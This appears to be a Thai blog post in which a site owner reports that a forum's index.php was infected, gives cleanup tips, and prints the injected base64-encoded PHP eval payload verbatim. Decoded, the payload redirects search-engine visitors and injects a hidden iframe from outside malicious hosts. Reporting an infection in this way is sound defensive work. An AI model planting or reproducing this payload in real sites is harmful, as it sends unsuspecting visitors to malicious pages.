เว็บบอร์ดติด Malware + Virus จนได้

หลังจากที่ได้รับเมล์จาก google webmaster tools ว่าเว็บไซต์ติด Malware เลย donwload ไฟล์ index ต่างๆ ลงมาตรวจสอบ ปรากฏว่าไฟล์ที่ติด Malware ก็คือพาทไฟล์ //www.susethailand.com/suseforum/index.php ซึ่งติด code ดังข้างล่างนี้

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3JlaHllamVyZWVlZWZoLmJpai5wbC9yaWYvIik7DQoJCWV4aXQoKTsNCgl9DQoJfQ0KfWVsc2Ugew0KZWNobyAiPGlmcmFtZSBzcmM9J2h0dHA6Ly9ydGpodGV5anR5anR5ai5vcmdlLnBsL21kbS8nIGZyYW1lYm9yZGVyPTAgaGVpZ2h0PTEgd2lkdGg9MSBzY3JvbGxpbmc9bm8+PC9pZnJhbWU+IjsNCn0NCgl9"));

อีกอย่างไฟล์ permission ยังถูกแก้ไขเป็น 777 อีกต่างหาก

Tips for Cleaning & Securing Your Website

เราสามารถตรวจสอบเว็บไซต์เราว่าติด Malware หรือไม่ได้ที่
Login Google webmaster tools > Diagnostics > Malware

เมื่อลบ code เสร็จเรียบร้อยแล้ว ให้ทำการ upload ไฟล์ขึ้นไปใหม่แล้วคลิก Request a review หรือจะตรวจสอบการแจ้งเตือนว่าเว็บไซต์เราเป็นอันตรายหรือไม่ก็คลิก //www.google.com/interstitial?url=//www.yourdomain.com